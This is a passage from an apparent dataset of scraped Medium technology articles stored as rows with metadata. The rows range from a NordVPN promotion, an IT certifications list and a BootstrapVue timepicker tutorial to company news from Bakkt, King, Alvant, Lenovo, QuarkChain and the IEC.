442oons isn’t the only YouTuber who chose NordVPN for online security. Flossy Carter and Kephrii protect themselves online with NordVPN as well.
Why NordVPN?
Few more reasons why 442oons chose NordVPN:
NordVPN is based in Panama where no mandatory data retention laws exist — they don’t log your personal browsing data and don’t have to. You don’t have to worry about your privacy whenever browsing the internet when connected to one of the servers of this VPN provider.
NordVPN is offering an inbuilt ad blocking software that ensures you don’t come across a malicious ad.
If you’re travelling in Turkey, China or any other country where the internet is heavily censored — you can simply connect to a VPN server and grant yourself access to Netflix, Facebook and stream that NFL match you don’t want to miss.
NordVPN does not impose data bandwidth limits — you can remain secure online and stream movies without any issues regarding internet speed. | https://medium.com/@alexschort/442oons-nordvpn-discount-offer-ccdd09342ff7 | ['Alex Chort'] | 2019-09-30 13:45:01.153000+00:00 | ['Cybersecurity', 'YouTube', 'Privacy', 'Technology', 'VPN'] |
122 | What Makes Artificial Intelligence As One Of The Most Leading Technology In The Entire World ? | Abilities of human to reason out and do a particular task can be conventionally defined as “Intelligence”. So a technology developed by the human that can replicate this human behavior and activities can be broadly defined as Artificial Intelligence. The artificial intelligence can also be broken down to two parts- general AI and narrow AI. The general AI mainly focuses on the machines that have at least equal human intelligence, if not more, to perform various mechanical tasks. The narrow AI focuses on machines that follow strict parameters like image recognition, language translation, reasoning based on logic and evidence and also planning and navigation.
These days the AI performs tasks by grouping them in three categories of intelligence:
Sensing
Reasoning
Communicating
And when it comes to robotics, a fourth factor is added to AI , i.e. Movement.
Among a mammoth number of reasons that sets AI apart as one of the most crucial technologies of current times, few of which are as follows :
1. Extreme working conditions :
One of the most prominent aspects of AI is that it is capable of taking (figuratively) a part of the human brain to places or working environments where humans cannot reach or survive physically. This is the reason : AI has grown to become the primary means for the advancement of humanity in the fields of Astronomy, Astrophysics, and Cosmology etc.
2. Automation of repetitive tasks and objectives :
AI on an elementary level, being capable of retaining memories of process pathways, and is capable of completing huge repetitive volumes of work all on its own without the involvement of a human brain. This is what qualifies it for being able to open a multitude of future innovations and opportunities for humankind.
3. A more in-depth analysis of data :
The ability of computers to operate massive amounts of data in a comparatively faster and more precise manner has opened up scopes of numerous future technological advancements and has resulted in enhanced data storage and security.
COURSE OBJECTIVES OF ARTIFICIAL INTELLIGENCE
To elevate business functions, AI is becoming smarter day by day. It is widely used in gaming, media, finance, robotics, quantum science, autonomous vehicles, and medical diagnosis as well. It has become a crucial prerequisite for companies to handle the enormous amounts of data generated regularly.
So, this course focuses mainly on the practical, hands-on experiments that allow you to implement your ideas and analyze the ways to make it better. Data science is an interdisciplinary field of scientific methods, algorithms etc. that can be used to help function the AI smoothly. This knowledge gives you a leverage of world-class industry expertise and boosts up your confidence to solve real-life projects.
THE OVERALL GOAL OF ARTIFICIAL INTELLIGENCE
AI Engineers are to making and implementing it as much as more smart , advance and most efficient to use AI in daily life applications. AI can be used to minimize any type of human error in a particular job. Precision, accuracy and speed are the basic advantages of AI over human. Also hostile environments, dangerous tasks that could cause injuries or any job that may have an emotional variable that might affect humans can be perfectly done by AI. | https://medium.com/my-great-learning/what-makes-artificial-intelligence-as-one-of-the-most-leading-technology-in-the-entire-world-37dde3992ca2 | ['Great Learning'] | 2019-09-23 11:42:19.728000+00:00 | ['Machine Learning', 'Careers', 'Career Advice', 'Artificial Intelligence', 'Technology'] |
123 | Top 7 certifications in 2021 | highest paying IT certifications in 2021 | Have any of these and you will be welcomed anywhere.
This article will walk you through the top 7 certifications in 2021 that are blowing up in the current job market, giving you a brief but in- depth analysis on what they cover and their respective job salaries.
These will help you dominate in your career and give you that huge salary advantage.
By the way, I am Agbejule Kehinde Favour.
Are you Pumped👍?
Cool!!
Stay tuned for the top spot🔥🔥🔥
With that said, let’s continue!!
Here is the list
Number 7
Digital marketing
Photo by Merakist on Unsplash
Digital marketing as the name implies, deals with the utilization of the internet and other digital technologies to advertise or sell out an company’s products and services.
Considering the fact that digital marketing is growing at a geometric progression nowadays, here is one of the best certifications you can take up.
The Google analytics IQ certification
It shows off your capabilities in analytical concepts like measuring campaign metrics, analysing KBIs and much more.
In the US, a digital marketing manager can earn about $112000 per annum with the right certification at hand.
Number 6
Big data
Photo by Luke Chesser on Unsplash
Big data allows you to analyse, extract and deal with huge and sophisticated data sets.
Here is one of the best certifications you can pick up.
# The Associate Certified Analytics Professional Certification (aCAP)
It focuses on a lot on analytics domains like:
# Analytics problem framing
# Business problem framing and much more.
Therefore, having this certification gives you the knowlegde you need to get started with the process of analytics.
A big data engineer can earn up to $158000 annually in the US.
Number 5
Networking
Photo by Jainath Ponnala on Unsplash
It involves the process of moving and exchanging data between nodes over a shared network.
So you can pick up;
The Cisco CCNA and CCNP certifications
Your ability to work with Cisco networking solutions are showcased by these associate and professional level certifications.
A networking engineer, with the right certification, earns approximately $130000 per annum in the United States.
Number 4
Cyber security
Photo by Dan Nelson on Unsplash
This refers to the protection of electronic systems and other forms of electronic technologies to save it from malicious attacks.
Here are the best qualifications you can take up.
1. The Certified Ethical Hacker Certification.
It showcases your ethical hacking skills in its five phase like :
# Reconnaissance
# Enumeration
# Gaining or getting access
# Sustaining or maintaining access
# Hiding or covering tracks
2. The Certified Information System Security Professional Certification ( CISSP ).
Your ability to draw plans, implement and manage a cyber security program is shown off by this certification.
Getting certified also validates your expertise and gives you access to exclusive resources, tools and other opportunities
With the right certification, a cyber security engineer earns about $150000 annually in the United States.
Related searches
Next up!
Number 3
Cloud computing
Photo by Sigmund on Unsplash
It involves delivering computing services with a number of different services over the internet and most times with a pay as you go basis.
Some of the popular certifications you can take up are:
1. The AWS Certified Solution Architect Associate Certification
This qualification will showcase your ability to design, deploy and secure apps on AWS to use the suitable structure, science and lots more.
2. The Microsoft Certified Azure Administration Certification
This certification is most suitable for people who desire to manage cloud services that entails :
# cloud capabilities
# storage
# Security and
# Networking.
A cloud computing engineer, with the right certfication at hand, can earn about $163000 per annum in the United States.
Number 2
Data science
Photo by Myriam Jessier on Unsplash
Data science refers to the combination of algorithms, scientific methods and systems to extract or collect information and insights from structured and unstructured data.
The best certifications you can take up in this field are:
1. HarvardX Data Science Professional Certificate
It will consist and educate on topics like:
# Data visualization
# Inference
# R programming skills
# Machine learning algorithms
# Important data science tools
# Concepts like probability and much more
2. The IBM Data Science Professional Certification.
As the name implies, it is powered by IBM.
It can help you to kick off with the stride of mastering:
# Data science
# SQL
# the development of machine learning tools
# Python
# the analysis and visualization of data, just to mention a few.
A data scientist, by picking the right certification, can earn up to $154000 in the US.
Finally the best, hottest and highest paying certification in 2021 is 🥁🥁🥁.......
Wait for it!
Number 1
AI and machine learning
Artificial intelligence is the brilliance and cleverness displayed by machines
Photo by Arseny Togulev on Unsplash
Machine learning, on the other hand, is the study of computer algorithms that allows systems to learn based on experience.
Photo by David Levêque on Unsplash
Here are the best certifications you can pick up.
1. Artificial Intelligence A-Z Certification By Udemy
It covers the concepts of machine learning, data science and deep learning to develop well-built real life applications
2. Machine learning, AI certification by Stanford offered by Cousera
This covers :
# The introduction to machine learning
# Data mining
# The best practices in machine learning
# Statistical pattern recognition and so on.
An AI engineer can earn approximately $150000, with the right certification in the US.
More for you
Conclusion
So that’s my package!
Those are the top 7 certifications in 2021!
What do you think of the list?
I would love to know what your list on this topic looks like!
Drop your answers in the response section.
It will be fun.
On your way there, don’t forget to leave some...👏👏👏
Thanks for your time!
Good luck!! | https://medium.com/analytics-vidhya/top-7-certifications-in-2021-highest-paying-it-certifications-in-2021-9c7f40f40f57 | [] | 2021-02-11 10:42:50.692000+00:00 | ['Advice', 'Certification', 'Information Technology', 'Programming', 'Jobs'] |
124 | Our first acquisition | Expanding Bakkt’s risk management, compliance and treasury operations
As we work to complete our first acquisition, the New Year is starting as deliberately as 2018 ended — punctuated by the closing of our first capital raise.
As those who’ve followed us since our first announcement in August know, our mission is to build the first integrated, institutional grade exchange-traded markets and custody solution for physical delivery of digital assets. In parallel, we’re building a secure, scalable platform for transacting with digital assets so that our regulated ecosystem serves consumers, merchants and institutions.
To advance that effort, I’m pleased to share that we have entered into an agreement to acquire certain assets of Rosenthal Collins Group (RCG), an independent futures commission merchant with nearly 100 years of earning clients’ trust. In December, RCG announced the sale of all its customer accounts to Marex Spectron, one of the world’s largest commodity brokers. As part of that transaction, our aim was to purchase certain valuable assets related to developing our platform. We expect to close the transaction in February, and are excited to welcome members of the RCG team to Bakkt.
How does this advance our work? First, it will enhance our risk management and treasury operations with systems and expertise. Other aspects of the transaction will contribute to our regulatory, AML/KYC and customer service operations as we help enable digital asset acceptance by bringing more choice and control to buyers and sellers.
This acquisition underlines the fact we’re not standing still as we await regulatory approval by the CFTC for the launch of regulated trading in our crypto markets. Our mission requires significant investment in technology to establish an innovative platform, as well as financial market expertise to deliver the most trusted fintech ecosystem for digital assets.
Our vision is to bring digital assets into the mainstream by enabling efficient transactions between consumers and merchants. Distributed ledger technology (DLT) has the potential to contribute to a lean, modern transaction platform that is compatible with existing merchant infrastructure. While DLT and cryptocurrencies are early in their development, we are committed to expanding the use of this technology to promote choice by building a fair, efficient platform for digital assets globally. | https://medium.com/bakkt-blog/our-first-acquisition-d8185bf99287 | [] | 2019-01-14 16:25:47.468000+00:00 | ['Technology', 'Cryptocurrency', 'Crypto', 'Fintech', 'Blockchain'] |
125 | Q&A with King’s 2019 GDC Scholars | If one blog post isn’t enough, we have more answers from King’s 2019 GDC scholars on their experiences at GDC!
For the fourth year in a row, in partnership with Diversi (a non-profit organisation which works for greater diversity within gaming), we offered female students a complimentary All Access pass to attend the 2019 Game Developer Conference in San Francisco and also an internship in one of our game studios. The scholarship is a part of our long term plan to encourage more female talent to join the games industry and so far has been a success, with all five scholars of 2018 joining King in full-time roles.
This year, the scholarship positions were tripled to fifteen, and the scholars have since returned from GDC ready to start their individual roles.
Ilke — Game Artist Intern — London
What was the best session/talk you attended?
My favourite session was ‘Expanding the World of Candy Crush: A Postmortem on ‘Candy Crush Friends Saga’ by Tracey John, Jeremy Kang and Robert Mackenzie, all speakers from King. The talk focused on the challenges posed by creating a new game in an old franchise in terms of the games’ art and design. There was a lot of details that I hadn’t thought about before. Seeing the problems as well as the team’s approach to solving them was enlightening to see!
What from GDC will you hope to take back to your work at King?
There were so many great talks by amazing people from King at GDC, it was an incredible insight into the work ethic and the King culture, and I’m really excited to be part of that! I’ve learnt about topics so much broader than my work role and I think that’s really important to be able to communicate with people from other teams and work together.
Sandra — Game Developer Intern — Barcelona
What was the best session/talk you attended?
‘Marvel’s Spider-Man’ AI Postmortem was the first session I attended and it is, without a doubt, the one that I enjoyed the most. The speaker, Adam Noonchester, talked about a vast amount of topics surrounding the game’s AI — from the combat to the animations, along with the navigation and physics, among others. I had to stop taking notes about what he explained, because it was a lot and everything was very interesting. As a game programmer, I could spend hours listening to how specific features and systems are made — and even more if I like the game!
Were there any tech sessions you enjoyed? If so, what was the session and why?
On Tuesday, I spent most of the day in the room where the ‘Math for Game Developers’ sessions were held. Among the tasks (all of them programming tutorials), the ‘Generating and using Navigation Meshes’ really caught my attention. Recently, we integrated the Recast & Detour libraries into the game engine that we are building at University for a project. This talk allowed me to have a better understanding of the complexity behind the generation from scratch and the later use of a navigation mesh through a step-by-step guide.
What attracted you to King?
King has always been very colourful to me, because of its titles and because of its culture. Everything at King goes around the word ‘fun’. The company shows the love that pours into the development of video games by putting the community first. In the first place, the community of workers, not only by having the most magical atmosphere in their offices but also by emphasising diversity. In second place, the community of players, from my younger cousin to my grandmother.
Andrea — Level Designer Intern — Malmo
What were you most excited for at GDC?
I was excited to go there and meet both the other GDC scholarship winners and other important video game developers from the industry. I was excited to go there and have a real taste of what a real videogame developer would in such a conference and learn as much from those people as possible for my future internship at King!
What from GDC will you hope to take back to your work at King?
The ability to learn from every person I meet regardless of their role to make myself a better professional and student and to never lose this ability to learn on the new industry standards as the years go by.
Angelika — Technical Artist Intern — Berlin
What was the best session/talk you attended?
I focused on the roundtables and tutorials — the ones that didn’t get recorded. This is where it was at — the round tables — full of great experienced people willing to share their problems and solutions, their knowledge so we can advance faster as an industry.
Were there any tech sessions you enjoyed? If so, what was the session and why?
“Math Game for Game Developers: Inside Neural Networks”
I loved Michael Buttner’s approach of including neural networks in a real-time scenario in Unity. That was, for me, the most advanced math talk. It uncovered the great hidden potential of using Neural Networks to solve difficult problems in performance-critical code.
Josefin — Level Designer Intern — Stockholm
What attracted you to King?
It’s an inclusive and creative work environment, which is very important to me. One of my personal goals is to make games that anyone can play, and to make gaming more inclusive, which is something that aligns very well with King’s goals.
Were there any tech sessions you enjoyed? If so, what was the session and why?
Adam Noonchester’s talk “Marvel’s Spider-Man AI Postmortem” was great. It was interesting to learn about advanced ways to use AI animations, attacks, and collisions in a big open world game.
GDC is an opportunity for King’s scholars to learn more about the industry and to gain a greater understanding of not only what tech is used when developing a game, but other areas they may be unaware of before. This experience will be useful during their scholarship and hopefully beyond!
If you would like to join our Kingdom, check out the opportunities on our job page! | https://medium.com/techking/q-a-with-kings-2019-gdc-scholars-cd7e0855db17 | ['Tech At King'] | 2019-06-13 06:25:19.442000+00:00 | ['Technology', 'Gaming', 'Gdc2019', 'Lifeatking', 'Internships'] |
126 | BootstrapVue — Text Area Customization and Time Picker | Photo by Daniel Klein on Unsplash
To make good looking Vue apps, we need to style our components.
To make our lives easier, we can use components with styles built-in.
In this article, we’ll look at how to customize a text area and add a time picker.
v-model Modifiers
The lazy , trim , number modifiers for v-model aren’t supported with the b-form-textarea component.
However, there are trim , number , and lazy props can be used to replace those modifiers.
Debounce
We can add the debounce prop to delay the input value binding to the state.
For instance, we can write:
<template>
<div id="app">
<b-form-textarea v-model="text" placeholder="Enter text" debounce="500" ></b-form-textarea>
<p>{{text}}</p>
</div>
</template> <script>
export default {
name: "App",
data() {
return {
text: ""
};
}
};
</script>
Then we delay the input value binding by 500 ms.
Autofocus
The autofocus prop can be added to the b-form-textarea to make it focus when the component loads or reactive in a keep-alive component.
Timepicker
We can use the b-form-timepicker component to add a time picker.
For instance, we can write:
<template>
<div id="app">
<b-form-timepicker v-model="value" locale="en"></b-form-timepicker>
<div>Value: {{ value }}</div>
</div>
</template> <script>
export default {
name: "App",
data() {
return {
value: ""
};
}
};
</script>
Then we can pick the time from the displayed input box.
The locale prop lets us change the locale.
value has the selected value, which is bound to the inputted value with v-model .
Disabled or Read Only States
We can add the disabled prop to remove all interactivity on the b-form-timepicker component.
readonly disables selecting a time, but will keep the component interactive.
We can write:
<b-form-timepicker v-model="value" disabled></b-form-timepicker>
or:
<b-form-timepicker v-model="value" readonly></b-form-timepicker>
to change both.
Validation States
Like other input comments, we can display the validation state with it.
For instance, we can write:
<template>
<div id="app">
<b-form-timepicker v-model="value" :state="!!value"></b-form-timepicker>
<div>Value: {{ value }}</div>
</div>
</template> <script>
export default {
name: "App",
data() {
return {
value: ""
};
}
};
</script>
We set the state prop to the value of value converted to a boolean.
Then we’ll see a red box if the time isn’t selected.
Otherwise, we see a green box.
Setting Seconds
We can set the seconds by adding the show-seconds prop.
For instance, we can write:
<template>
<div id="app">
<b-form-timepicker v-model="value" show-seconds></b-form-timepicker>
<div>Value: {{ value }}</div>
</div>
</template> <script>
export default {
name: "App",
data() {
return {
value: ""
};
}
};
</script>
Now we see the seconds box and we can set the seconds.
Sizing
We can add the size prop to change the size of the time picker sizing.
For example, we can write:
<template>
<div id="app">
<b-form-timepicker v-model="value" size="sm"></b-form-timepicker>
<div>Value: {{ value }}</div>
</div>
</template> <script>
export default {
name: "App",
data() {
return {
value: ""
};
}
};
</script>
to shrink the time picker’s size.
We can also change the value to 'lg' to make it larger than the default.
Optional Controls
We can add optional controls to the time picker with a few props.
For instance, we can add the now-button to let users pick the current time.
reset-button displays a reset button to let users reset the time.
For example, we can write:
<template>
<div id="app">
<b-form-timepicker v-model="value" now-button reset-button></b-form-timepicker>
<div>Value: {{ value }}</div>
</div>
</template> <script>
export default {
name: "App",
data() {
return {
value: ""
};
}
};
</script>
Then we can see the buttons on the time picker.
Button Only Mode
The button-only prop lets us change the time picker to button-only mode.
For example, we can write:
<template>
<div id="app">
<b-input-group class="mb-3">
<b-form-input v-model="value" type="text" placeholder="Select time"></b-form-input>
<b-input-group-append>
<b-form-timepicker v-model="value" right button-only></b-form-timepicker>
</b-input-group-append>
</b-input-group>
<div>Value: {{ value }}</div>
</div>
</template> <script>
export default {
name: "App",
data() {
return {
value: ""
};
}
};
</script>
Then we have an input box with the time displayed.
But we can’t click it to show the time picker.
The button on the right of the input box lets us select the time.
We need the right prop so that the right edge of the date picker will be aligned to the right side of the button.
Photo by Mike Benna on Unsplash
Conclusion
We can add denounce to a text area.
Also, we can add a time picker to let us add a time picker control and customize it. | https://medium.com/dev-genius/bootstrapvue-text-area-customization-and-time-picker-bd68e535fb5b | ['John Au-Yeung'] | 2020-06-28 18:42:50.600000+00:00 | ['Technology', 'Programming', 'Software Development', 'Web Development', 'JavaScript'] |
127 | Scale-up Spotlight: A conversation with the commercial director of Alvant, Richard Thompson | Scale-up Spotlight: A conversation with the commercial director of Alvant, Richard Thompson
Richard Thompson, commercial director of materials specialist Alvant, talks about the importance of sustainability and innovation in post-Covid manufacturing and the role materials tech is playing across automotive, aerospace, consumer tech, and many other sectors. Top Business Tech Dec 28, 2021·5 min read
Richard Thompson, commercial director of materials specialist Alvant, talks about the importance of sustainability and innovation in post-Covid manufacturing and the role materials tech is playing across automotive, aerospace, consumer tech, and many other sectors.
Alvant — originally known as CMT — was established in 2003, specializing in designing, developing, testing, and manufacturing Aluminium Metal Matrix Composite materials and components (AMCs), a family of lightweight high-performance metals. AMCs are used in highly engineered products for multiple applications across many sectors, including aerospace, automotive, healthcare, the industrial, and high-end consumer. This can be parts for TVs, mobile devices, landing gear, electric motors, car interiors, biomechanical prosthetics, sports equipment, and wheelchairs — the list is as diverse as it is long!
AMCs provide the strength and stiffness of steel at less than half the weight and have superior damage tolerance and a higher thermal operating range. Engineers and manufacturers can use AMCs for more durable lightweight components for harsh environments. Product manufacturers and engineers are becoming more aware of how AMCs can sometimes be a better alternative than other composite materials or unreinforced metals.
Alvant provides ‘route to market’ services for integrating its AMCs; The focus is on solving problems with creative and commercially viable solutions. This is particularly important now as engineers face growing pressure to reduce weight to meet stringent market and legislative demands while simultaneously being cost-effective.
Richard Thompson informs that the method Alvant uses to create its materials, called Advanced Liquid Pressure Forming, has been developed specifically for its product and is patented. This sets the company apart from others in the market and makes them a viable alternative to other materials such as carbon and polymer composites, steel, titanium, and aluminum. These materials are either not recyclable or very difficult to recycle, unlike fiber-reinforced AMCs that have scope to recycle.
AMCs have many benefits, including having the strength and capability of steel yet the weight of aluminum while being more tolerant to physical and thermal damage than carbon composite materials. They also create less of an impact environmentally when it comes to sustainability issues. This is mainly because aluminum itself is abundant and has a less environmental impact during production than titanium.
It isn’t difficult to see why AMCs could provide a massive differential and offer game-changing potential across many industries as commercial demand increases for strong but lighter parts across many forms of transportation, as well as industrial and consumer applications. Companies are all looking for ways to increase product capabilities and performance while at the same time meeting ambitious goals for fuel efficiency and sustainability.
Thompson explains the company’s most significant achievement to be the part the company has contributed to the global-wide objective to achieve net-zero carbon emissions by 2050. Alvant has partnered with global-leading Safran Landing Systems on a two-year, £28 mn aerospace project titled ‘Large Landing Gear of the Future.’ Alvant’s contribution to the project is the design, manufacture, and testing of an AMC brake rod, targeting a 30% weight reduction over an equivalent titanium component while maintaining the same strength as steel. In fact, the current simulations suggest a 40% weight saving can be achieved over the original titanium part, citing a crucial project milestone scheduled for completion this year.
Alvant has partnered with Safran in the aerospace sector to create lighter weight landing gear
Besides weight reduction, the project aims to cut fuel burn and noise as part of the industry’s drive to reduce fuel consumption and carbon emissions while improving reliability and lowering ownership costs. This is of major significance for Alvant as a company because the project’s success will enable the validation of AMCs in areas where safety and reliability are essential. This puts Alvant firmly on course to help Safran not only solve some of their upcoming technological challenges but to help them remain competitive in the landing gear aerospace market and showcase innovative technologies for the industry’s future.
During Covid, the economy’s sudden plunge instantly impacted most automotive, industrial, and aerospace sectors, which unfortunately is where a significant chunk of Alvant’s market is based. Thompson says that “although we have been able to function throughout, it gave us an opportunity to bring forward part of our business growth plan and has enabled us to forge partnerships with manufacturers who still need to achieve the ambitious capability and sustainability goals, but with reduced internal resources. So, we’ve been quite lucky in many regards.”
Read More:
Moving forward, Thompson explains that the company has seen the biggest emissions decline since the Second World War during the Covid lockdown and explains that stakeholders are more concentrated now on Zero-emissions goals, so have different expectations on businesses. “Sustainability is redefining itself in the post-Covid world, and it has now changed scope, placing non-sustainable materials under far more scrutiny.” Focus has been placed largely on sustainable materials, and businesses are now considering the entire product life cycle and the ability to reuse, which is now very much a consideration in design development at Alvant.
AMCs are more sustainable thanks to the manner in which they separate the fibers from the aluminum at the end-of-life stage. Designers must increasingly factor ‘whole life cost’ into the design, and it’s an area where AMCs score well. “If we don’t use the past 12 months or so as a wake-up call and an opportunity to prompt radical change, then I don’t know what will. We may not get another chance,” Thompson states.
Click here to discover more of our podcasts
For more news from Top Business Tech, don’t forget to subscribe to our daily bulletin!
Follow us on LinkedIn and Twitter
About Richard Thompson
Commercial Director (BEng MBA CEng FIMechE)
Richard is a technology commercialization professional specializing in strategic market development, innovation, and new venture growth. Richard joined Alvant in October 2017 from Williams Advanced Engineering, the technology and engineering consultancy division of the Williams Formula 1 Group. He has worked for a range of high-performance engineering businesses and new venture companies developing and commercializing intellectual property. Richard was appointed as Commercial Director in February 2018. | https://medium.com/tbtech-news/scale-up-spotlight-a-conversation-with-the-commercial-director-of-alvant-richard-thompson-575625231f2a | ['Top Business Tech'] | 2021-12-28 10:05:31.874000+00:00 | ['It', 'Technology', 'Alvant', 'Business', 'Scaleup Spotlight'] |
128 | Technology’s Voodoo Reputation: Unfair and Unwarranted | Ask any engineer the question, “is technology disruptive”, and the answer will be “of course!”
The result of that disruption is often that technology attracts a voodoo reputation — something to be wary of, or even feared.
It’s a reputation that is unfair and unwarranted.
We forget that we’ve become accustomed to change, and adept at embracing any technology that suits our lifestyles, or improves the way we work. We’re more comfortable about disruptive change than we once were — because we know that, once technology has done its disruptive worst, it evolves to become productive in its impact, and how it changes our lives.
This evolution process is not new, and predates IT, but the evolution process has become much faster. When I joined Lenovo in 2005, social media, online communities, the concept of cloud computing, and always-on connectivity were still evolving concepts, and most took some years to make their mark on the business mainstream (something that’s difficult now to remember!).
The most-obvious recent example is the Covid-era move to working from home. Most of us have made that transition (albeit with little choice, as it happens), and technology, although a disruption for many, has made this possible.
At first we reacted out of necessity. Now we’re moving to the productive end of this technology continuum — in as little as six months. Companies are moving from managing an abrupt change of workplace options to planning for their futures, in particular the degree to which they deploy technology to allow those of us who want to stay based at home to do so. Users are challenging the way they used technology before the lockdown. The WEF reported in June that 98% of workers wanted the option to work from home for the rest of their careers! That’s a big shift, and productive technology, hard on the heels of an initial disruptive event, continues to play its part.
Forget voodoo: Technology drives business advantage
That unfair voodoo reputation also often stems from concerns that technology will replace people, shut down businesses or affect livelihoods when it appears for the first time. Today, those fears revolve around technology that includes AI, machine learning, and technology security, as examples.
As an executive with an engineering background working with many businesses, listening to their needs, and leading teams that work out solutions to meet those needs, I believe it’s more the case that technology solves problems, and freeing time to consider what really matters in businesses — customer experiences and employee satisfaction.
User mobility is one example. One of the biggest pains most of us suffer is that we use multiple passwords every day. In tomorrow’s mobile world, devices will know who I am by my voice, perhaps in the context of my location, how I’m about to use my device and the network it’s attached to. If it sounds like me, if I’m acting in a way that’s consistent with who I am in the company, if the work I want to do fits what’s been seen from me in the past, it probably is me — and I can be given access rights to data and resources to be able to do my work without the current pain of having to remember multiple passwords, or of joining and leaving discrete networks.
Acknowledging that technology often starts as disruptive, and ends up being productive, how should organizations move ahead?
By addressing the business problem in new ways, using technology to drive new and different approaches to resolving those problems.
The story always needs to be about how technology is going to give you business advantage — whether it’s attracting and keeping talent, or enabling a field engineer to understand a problem more effectively, leveraging data and edge computing to make better decisions.
The questions about disruption versus innovation then become centered on the business problems for which you want to find a technology solution.
Answer those questions, and technology’s voodoo reputation around technology disappears.
I’ll expand on some of these themes in future articles, but in the meantime, let me know your thoughts on the Comments below. I’d love to start a conversation.
About the Author
Jerry Paradise is a 15-year veteran of Lenovo. He is responsible for leading the team that develops the product requirements, including the technical and design specifications, for all of Lenovo’s commercial products outside the data center. Start a conversation with Jerry here, on LinkedIn or on Twitter. | https://medium.com/swlh/technologys-voodoo-reputation-unfair-and-unwarranted-2db98be92b34 | ['Jerry Paradise'] | 2020-08-13 07:24:38.186000+00:00 | ['Tech', 'Disruption', 'Lenovo', 'Disruptive Innovation', 'Technology'] |
129 | QuarkChain CEO Qi Zhou Participated in LA Blockchain Summit and Joined Unfolding China’s Decentralized Finance Landscape Panel | QuarkChain CEO Qi Zhou Participated in LA Blockchain Summit and Joined Unfolding China’s Decentralized Finance Landscape Panel QuarkChain Follow Oct 26 · 2 min read
LA Blockchain Summit was held on Oct 06 — Oct 07, 2020. This year’s summit was an online event. The Summit is the leading conference & expo focused on blockchain investing, building and mainstream adoption. It’s an exclusive, curated, high-impact informative and thought-provoking event presented by some of the world’s foremost innovators, change makers and prominent leaders in the blockchain ecosystem. Dr. Qi Zhou, QuarkChain’s founder and CEO, was invited to participate in the summit and presented his opinions at a panel discussion, chatting with the most accomplished, powerful and astounding list of industry leaders and speakers.
The panel Dr. Qi Zhou presented was “Unfolding China’s Decentralized Finance Landscape”. The panel was started with concerns about constant rivalry primarily between the US and China, as well as the rest of the world. The participants shared their opinions about the competitions in blockchain technology and why would China want to adopt a truly decentralized technology.
In the panel discussion, Qi Zhou introduced QuarkChain’s DeFi designs and features. He pointed out that a mature DeFi platform must have the following features: high efficiency, low gas fee, secure, easy to use, and easy combination. He explained QuarkChain’s unique solution: Multi-chain Heterogeneous + DeFi + Multi-native tokens. Besides, Qi also introduced the design concept of Equalizer, an AMM DEX with equal and self-adjusting governance token distribution. It was the first Dex project that QuarkChain supported, and enriches QuarkChain’s ecosystem.
To learn more details about the panel, please watch the video at: https://www.youtube.com/watch?v=7eHoqvb3H0E&list=PLFJJb69BM_KJhE-Z-1whIOASAkfTf2j_M&index=26&ab_channel=LABlockchainSummit | https://medium.com/quarkchain-official/quarkchain-ceo-qi-zhou-participated-in-la-blockchain-summit-and-joined-unfolding-chinas-27e9a5028e37 | [] | 2020-10-26 21:27:21.775000+00:00 | ['Blockchain Summit', 'Defi', 'Quarkchain', 'Blockchain Technology'] |
130 | Learning how to make online meetings more engaging | International technology standards not only promote best practices in efficiency, trustworthiness and safety, but also they are essential for the removal of technical barriers to trade. They are developed and agreed through a process of consensus that relies on at least some face to face meetings between engineers, scientists, regulators and other experts from all over the world. The COVID-19 pandemic has forced all of these meetings online, which presents challenges when hundreds of experts, most of whom are not native English speakers, come together to identify solutions.
The Australian, Mike Wood, understands these challenges better than most. Wood, who is based near Melbourne, chairs a committee (TC 106) that develops international standards on measurement and calculation methods to assess human exposure to electromagnetic fields. Their work helps governments and bodies like the World Health Organization to make important decisions about public health and safety. In his day job, Wood works for the telecommunications company, Telstra, as Principal for EME Strategy, Governance and Risk Management.
A priority for businesses and other organizations around the world, during the COVID-19 pandemic, has been to minimize the impact on public health while continuing to work, in order to limit disruption to the economy. For its part, IEC has been finding new ways to collaborate with an international network of more than 20 thousand experts, in order to continue vital standardization and conformity assessment work. IEC experts usually come together several times a year, in hundreds of different committees and working groups, for essential face to face meetings that not only build working relations, but also help them to each consensus decisions.
In a revealing interview, Wood offers a rare look behind the scenes. He identifies some of the challenges that experts are currently facing, including the very different situations in the many countries where they are based. He also explains how TC 106 have a focus on helping their people and have striven to make their meetings more social.
Q: The pandemic has had a massive impact on travel and the way we work. What are the challenges of chairing a meeting when it is online?
A: A lot of technical committees and a lot of teams rely on meeting face to face a number of times each year. The remote sessions build on that, but you’ve already got the rapport. When you’re facilitating and chairing a pure remote meeting, you can’t read the room as well if there’s no visual contact. People may not be as engaged. You’re really down to just talking about some technical content, but you can’t really engage with people on a personal level.
When you’ve got some video connection, at least you can see people and people are more engaged in the content. But of course, you can’t have a coffee break, or sit down for a face to face discussion. Its difficult to structure the meeting in a way that you can deal with certain topics, have a break, take some issues offline and have some further one on one discussions.
The advantage of face to face meetings is that you can address a range of different aspects of your work in a range of different manners. When you’re just online, things really change — typically, most online meetings focus on one or two particular areas. But we’re in a situation this year where we don’t have a choice. It’s a case of finding out what does and doesn’t work. Of course, what works for some teams might not work for others.
Q: You recently had your first online technical meeting this year. What worked for you?
A: Yes, we were due to all meet in Canada in April but converted the series of Working Group and Project Team meetings to occur the same week but all online. One of the best parts of it was a virtual coffee break in one of the larger Working Groups, where we stopped for 15 or 20 minutes and we just went around the group. There were 30-odd people and we were just talking like we were sitting next to each other and sharing not our work, but just sharing our local experiences. You could see the room ‘light up’, you could see the faces get more engaged. The meeting changed after that because people were actually more engaged in the overall process.
Hats off to the convenor of that particular session because it was a very warming atmosphere. I’ve taken part in meetings where you’re just talking technical content and you can lose concentration. There’ll be some things that work really well, while some things will be real challenges. As leaders, it’s up to us to read the room and structure the meeting so that we can engage with people.
Q: In terms of keeping everyone engaged, what is the most common problem you encounter and what’s the solution?
A: When there’s a lot of people, you also need to reach out to those that aren’t speaking. Some people with English as a second language might not contribute as much online, whereas in a face to face meeting, you can have separate discussions.
I think we’re all going to learn. One of the groups I like to turn to in these sorts of scenarios are our IEC Young Professionals because they’ve grown up online and do a lot of their work online. We’re going to learn a lot from them too. But, as chairs, we should also speak to each other and come up with ideas that work and focus on the things that are going to really help us this year.
Q: Would I be right in thinking that project work is easier because you have always done a lot of that online?
A: You certainly are right. We’re used to that. You’ve got a dedicated set of tasks and you’ve got actions and one step leads to another. A lot of companies do it online. In Australia, for example, we have online and video meetings every single day.
